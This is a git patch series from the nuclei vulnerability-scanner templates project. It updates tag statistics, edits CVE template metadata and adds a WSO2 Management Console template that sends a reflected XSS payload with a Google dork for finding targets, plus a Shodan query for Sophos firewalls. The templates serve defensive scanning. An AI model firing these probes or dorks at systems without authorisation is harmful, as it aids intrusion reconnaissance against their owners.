| | | +| okta | 1 | | | | | | | | | +| hanwang | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | | tjws | 1 | | | | | | | | | | adminset | 1 | | | | | | | | | -| cofense | 1 | | | | | | | | | -| joget | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| abstractapi | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| wdja | 1 | | | | | | | | | +| apple | 1 | | | | | | | | | | activecollab | 1 | | | | | | | | | -| charity | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| zoomsounds | 1 | | | | | | | | | +| google-earth | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| lfw | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| ocs-inventory | 1 | | | | | | | | | +| ptr | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| antsword | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | | mirasys | 1 | | | | | | | | | -| wago | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| radius | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| gnuboard | 1 | | | | | | | | | -| axiom | 1 | | | | | | | | | -| netbeans | 1 | | | | | | | | | -| slocum | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | +| ncbi | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| threatq | 1 | | | | | | | | | +| intelliflash | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| esxi | 1 | | | | | | | | | +| bravenewcoin | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| sauter | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| opnsense | 1 | | | | | | | | | +| tuxedo | 1 | | | | | | | | | +| webctrl | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| acsoft | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | | perl | 1 | | | | | | | | | -| sunflower | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| overflow | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| caddy | 1 | | | | | | | | | -| bhagavadgita | 1 | | | | | | | | | -| novnc | 1 | | | | | | | | | -| urlscan | 1 | | | | | | | | | -| pieregister | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| dahua | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| hanming | 1 | | | | | | | | | -| mapbox | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| cve2002 | 1 | | | | | | | | | -| bitrise | 1 | | | | | | | | | -| cname | 1 | | | | | | | | | -| mdm | 1 | | | | | | | | | +| zuul | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| kenesto | 1 | | | | | | | | | +| hrsale | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | | piwigo | 1 | | | | | | | | | -| lumis | 1 | | | | | | | | | -| covalent | 1 | | | | | | | | | -| yopass | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| f5 | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| bitrise | 1 | | | | | | | | | +| faust | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| lenovo | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| urlscan | 1 | | | | | | | | | +| directadmin | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| smuggling | 1 | | | | | | | | | +| calendarific | 1 | | | | | | | | | +| idera | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| prismaweb | 1 | | | | | | | | | +| richfaces | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| oliver | 1 | | | | | | | | | +| quip | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| opengear | 1 | | | | | | | | | | nutanix | 1 | | | | | | | | | -| acemanager | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| sourcecodester | 1 | | | | | | | | | +| crestron | 1 | | | | | | | | | +| asanhamayesh | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| yishaadmin | 1 | | | | | | | | | +| vision | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| shadoweb | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| pirelli | 1 | | | | | | | | | +| edgeos | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| books | 1 | | | | | | | | | +| instatus | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| paneil | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| flowci | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| microcomputers | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| clearbit | 1 | | | | | | | | | +| malshare | 1 | | | | | | | | | +| dericam | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| mozilla | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| primefaces | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| short.io | 1 | | | | | | | | | +| b2bbuilder | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| mdm | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| kyocera | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| accent | 1 | | | | | | | | | +| workspace | 1 | | | | | | | | | +| purestorage | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| intellislot | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| newsletter | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| fastly | 1 | | | | | | | | | +| malwarebazaar | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| php-fusion | 1 | | | | | | | | | +| h5sconsole | 1 | | | | | | | | | +| blueiris | 1 | | | | | | | | | +| buildbot | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| cucm | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| u8 | 1 | | | | | | | | | +| easyappointments | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| istat | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| struts2 | 1 | | | | | | | | | +| portal | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| scalar | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| unisharp | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| siteomat | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| quantum | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| siemens | 1 | | | | | | | | | +| fleet | 1 | | | | | | | | | +| snipeit | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| semaphore | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| workresources | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| droneci | 1 | | | | | | | | | +| raspberrymatic | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| sls | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| cvnd2018 | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| shindig | 1 | | | | | | | | | +| sponip | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| revslider | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| secnet | 1 | | | | | | | | | +| sso | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| ncomputing | 1 | | | | | | | | | +| bonita | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| processwire | 1 | | | | | | | | | +| viaware | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| sofneta | 1 | | | | | | | | | +| contactform | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| hue | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| emessage | 1 | | | | | | | | | +| avatier | 1 | | | | | | | | | +| ldap | 1 | | | | | | | | | +| goip | 1 | | | | | | | | | +| gofile | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| web3storage | 1 | | | | | | | | | +| bigfix | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| aerohive | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| alltube | 1 | | | | | | | | | +| cron | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| satellian | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| covalent | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| spiderfoot | 1 | | | | | | | | | +| dasan | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| checkmarx | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| casemanager | 1 | | | | | | | | | +| telecom | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| cve2000 | 1 | | | | | | | | | +| eyoumail | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| helpdesk | 1 | | | | | | | | | +| comfortel | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| wordcloud | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| webalizer | 1 | | | | | | | | | +| webeditors | 1 | | | | | | | | | +| fanwei | 1 | | | | | | | | | +| ruoyi | 1 | | | | | | | | | +| wago | 1 | | | | | | | | | +| argocd | 1 | | | | | | | | | +| boa | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| ucp | 1 | | | | | | | | | +| overflow | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| stackstorm | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| cooperhewitt | 1 | | | | | | | | | +| mastodon | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| concrete5 | 1 | | | | | | | | | +| version | 1 | | | | | | | | | +| directum | 1 | | | | | | | | | +| gcp | 1 | | | | | | | | | +| noptin | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | | weglot | 1 | | | | | | | | | -| zipkin | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| securepoint | 1 | | | | | | | | | +| pollbot | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| rainloop | 1 | | | | | | | | | +| tplink | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| pan | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| jeecg-boot | 1 | | | | | | | | | +| totolink | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| emerson | 1 | | | | | | | | | +| ipvpn | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| barracuda | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| dwsync | 1 | | | | | | | | | +| xamr | 1 | | | | | | | | | +| edgemax | 1 | | | | | | | | | +| clustering | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| weboftrust | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| admidio | 1 | | | | | | | | | +| opencart | 1 | | | | | | | | | +| jupyterhub | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| veeam | 1 | | | | | | | | | +| oauth2 | 1 | | | | | | | | | +| xproxy | 1 | | | | | | | | | +| h2 | 1 | | | | | | | | | +| seopanel | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| markdown | 1 | | | | | | | | | +| f5 | 1 | | | | | | | | | +| synapse | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| huemagic | 1 | | | | | | | | | +| dvdFab | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| mtheme | 1 | | | | | | | | | +| whmcs | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| yarn | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| issabel | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| adfs | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| strider | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| oki | 1 | | | | | | | | | +| roundcube | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| jinher | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| hetzner | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| emlog | 1 | | | | | | | | | +| twig | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| restler | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| gateway | 1 | | | | | | | | | +| couchcms | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| eyesofnetwork | 1 | | | | | | | | | +| iserver | 1 | | | | | | | | | +| gnuboard | 1 | | | | | | | | | +| osquery | 1 | | | | | | | | | +| apcu | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| icinga | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| vms | 1 | | | | | | | | | +| zeppelin | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| identityguard | 1 | | | | | | | | | +| librenms | 1 | | | | | | | | | +| bitquery | 1 | | | | | | | | | +| submitty | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 063a2d959f..07b8f2d2b1 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1146 | daffainfo | 560 | cves | 1150 | info | 1183 | http | 3159 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 868 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 656 | network | 50 | -| xss | 361 | pdteam | 262 | technologies | 251 | critical | 410 | dns | 17 | +| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | +| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | +| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | +| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | | wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 167 | misconfiguration | 196 | unknown | 6 | | | -| rce | 288 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 282 | 0x_akoko | 128 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 94 | | | | | +| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | +| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | +| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | | wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | From 129949bfeb7d1842b3e2e668395a54356ff303b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 9 May 2022 09:57:52 +0000 Subject: [PATCH 088/115] Auto README Update [Mon May 9 09:57:52 UTC 2022] :robot: --- README.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index b841738b58..da6f508012 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 1146 | daffainfo | 560 | cves | 1150 | info | 1183 | http | 3159 | -| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 868 | file | 68 | -| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 656 | network | 50 | -| xss | 361 | pdteam | 262 | technologies | 251 | critical | 410 | dns | 17 | +| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 | +| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 | +| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 | +| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 | | wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | | -| exposure | 292 | dwisiswant0 | 167 | misconfiguration | 196 | unknown | 6 | | | -| rce | 288 | princechaddha | 130 | workflows | 186 | | | | | -| cve2021 | 282 | 0x_akoko | 128 | token-spray | 153 | | | | | -| tech | 265 | gy741 | 117 | default-logins | 94 | | | | | +| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | | +| rce | 289 | princechaddha | 130 | workflows | 186 | | | | | +| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | | +| tech | 265 | gy741 | 117 | default-logins | 95 | | | | | | wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | | -**260 directories, 3515 files**. +**260 directories, 3520 files**. From 681f1ddaf0a2de398b9e7677de653be95a670f45 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Mon, 9 May 2022 12:25:53 +0200 Subject: [PATCH 089/115] Add CVE-2022-29548 --- cves/2022/CVE-2022-29548.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2022/CVE-2022-29548.yaml diff --git a/cves/2022/CVE-2022-29548.yaml b/cves/2022/CVE-2022-29548.yaml new file mode 100644 index 0000000000..8f733faedf --- /dev/null +++ b/cves/2022/CVE-2022-29548.yaml @@ -0,0 +1,39 @@ +id: CVE-2022-29548 + +info: + name: WSO2 Management Console - Reflected XSS + author: edoardottt + severity: medium + description: A reflected XSS issue exists in the Management Console of several WSO2 products. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-29548 + cwe-id: CWE-79 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-29548 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548 + tags: cve,cve2022,wso2,xss + metadata: + google-dork: inurl:"carbon/admin/login" + +requests: + - method: GET + path: + - "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + part: body + words: + - "CARBON.showWarningDialog('???');alert(document.domain)//???" \ No newline at end of file From 2a74f9ffdabb7b1b9b02e765a33f9bced2ece99a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com> Date: Mon, 9 May 2022 21:54:47 +0800 Subject: [PATCH 090/115] Update CVE-2022-1040.yaml --- cves/2022/CVE-2022-1040.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1040.yaml b/cves/2022/CVE-2022-1040.yaml index deea98159f..0905fda868 100644 --- a/cves/2022/CVE-2022-1040.yaml +++ b/cves/2022/CVE-2022-1040.yaml @@ -7,7 +7,10 @@ info: description: An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. reference: - https://github.com/killvxk/CVE-2022-1040 + - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 + metadata: + shodan-query: http.title:"Sophos" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 9.8 @@ -27,7 +30,7 @@ requests: - type: word part: body words: - - "{\"status\":400}" + - "{\"status\":\"Session Expired\"}" - type: word part: header From 9ff9285916ab600cf28c6d4a373e522e585635d1 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Mon, 9 May 2022 12:12:52 -0400 Subject: [PATCH 091/115] Dashboard Content Enhancements (#4338) Dashboard Content Enhancements --- cves/2001/CVE-2001-1473.yaml | 2 +- cves/2005/CVE-2005-2428.yaml | 7 ++++--- cves/2019/CVE-2019-1821.yaml | 7 +++++-- cves/2019/CVE-2019-18394.yaml | 7 +++++-- cves/2019/CVE-2019-18818.yaml | 7 ++++--- cves/2019/CVE-2019-19781.yaml | 8 ++++++-- cves/2019/CVE-2019-2578.yaml | 9 +++++---- cves/2019/CVE-2019-2579.yaml | 12 +++++++----- cves/2019/CVE-2019-2725.yaml | 9 ++++++--- cves/2019/CVE-2019-3396.yaml | 9 +++++---- cves/2019/CVE-2019-3929.yaml | 8 ++++---- cves/2019/CVE-2019-5127.yaml | 8 +++++--- cves/2019/CVE-2019-6112.yaml | 10 ++++++---- cves/2019/CVE-2019-7238.yaml | 9 ++++++--- cves/2019/CVE-2019-7256.yaml | 5 ++++- cves/2019/CVE-2019-7609.yaml | 10 ++++++---- cves/2019/CVE-2019-8982.yaml | 7 ++++--- cves/2019/CVE-2019-9618.yaml | 7 +++++-- cves/2019/CVE-2019-9670.yaml | 10 +++++++--- cves/2019/CVE-2019-9733.yaml | 10 +++++----- cves/2020/CVE-2020-11034.yaml | 8 ++++++-- cves/2020/CVE-2020-11529.yaml | 8 ++++++-- cves/2020/CVE-2020-11546.yaml | 7 ++++--- cves/2020/CVE-2020-12116.yaml | 5 +++-- cves/2020/CVE-2020-12447.yaml | 6 ++++-- cves/2020/CVE-2020-14092.yaml | 4 ++-- cves/2020/CVE-2020-17453.yaml | 7 +++++-- cves/2020/CVE-2020-19360.yaml | 4 +++- cves/2020/CVE-2020-2140.yaml | 7 +++++-- cves/2020/CVE-2020-23575.yaml | 6 ++++-- cves/2020/CVE-2020-24223.yaml | 9 ++++++--- cves/2021/CVE-2021-1497.yaml | 4 ++++ cves/2021/CVE-2021-20090.yaml | 8 +++++--- cves/2021/CVE-2021-20158.yaml | 8 ++++---- cves/2021/CVE-2021-20167.yaml | 8 +++----- cves/2021/CVE-2021-20837.yaml | 9 +++++---- cves/2021/CVE-2021-21307.yaml | 10 ++++++---- cves/2021/CVE-2021-21479.yaml | 9 ++++++--- cves/2021/CVE-2021-21881.yaml | 7 ++++--- cves/2021/CVE-2021-21972.yaml | 7 +++++-- cves/2021/CVE-2021-21978.yaml | 10 ++++++---- cves/2021/CVE-2021-21985.yaml | 6 ++++-- cves/2021/CVE-2021-22005.yaml | 8 +++++--- cves/2021/CVE-2021-22205.yaml | 10 +++++----- cves/2021/CVE-2021-22986.yaml | 6 +++--- cves/2021/CVE-2021-24285.yaml | 8 ++++---- cves/2021/CVE-2021-24472.yaml | 8 +++++--- misconfiguration/proxy/open-proxy-portscan.yaml | 2 +- 48 files changed, 223 insertions(+), 137 deletions(-) diff --git a/cves/2001/CVE-2001-1473.yaml b/cves/2001/CVE-2001-1473.yaml index e65f00aeed..b52317707c 100644 --- a/cves/2001/CVE-2001-1473.yaml +++ b/cves/2001/CVE-2001-1473.yaml @@ -26,4 +26,4 @@ network: words: - "SSH-1" -# Updated by Chris on 2022/01/21 +# Enhanced by Chris on 2022/01/21 diff --git a/cves/2005/CVE-2005-2428.yaml b/cves/2005/CVE-2005-2428.yaml index c8ae55e1dd..3e3965fc30 100644 --- a/cves/2005/CVE-2005-2428.yaml +++ b/cves/2005/CVE-2005-2428.yaml @@ -1,13 +1,14 @@ id: CVE-2005-2428 info: - name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure + name: Lotus Domino R5 and R6 WebMail - Information Disclosure author: CasperGN severity: medium - description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + description: "Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696)." reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf - https://www.exploit-db.com/exploits/39495 + - https://nvd.nist.gov/vuln/detail/CVE-2005-2428 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -31,4 +32,4 @@ requests: - '(' -# Enhanced by mp on 2022/04/06 + +# Enhanced by mp on 2022/05/04 diff --git a/cves/2019/CVE-2019-2579.yaml b/cves/2019/CVE-2019-2579.yaml index cad101696a..f39f189ff5 100644 --- a/cves/2019/CVE-2019-2579.yaml +++ b/cves/2019/CVE-2019-2579.yaml @@ -1,14 +1,14 @@ id: CVE-2019-2579 info: - name: Oracle WebCenter Sites - SQL Injection + name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection author: leovalcante severity: medium - description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker - with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle 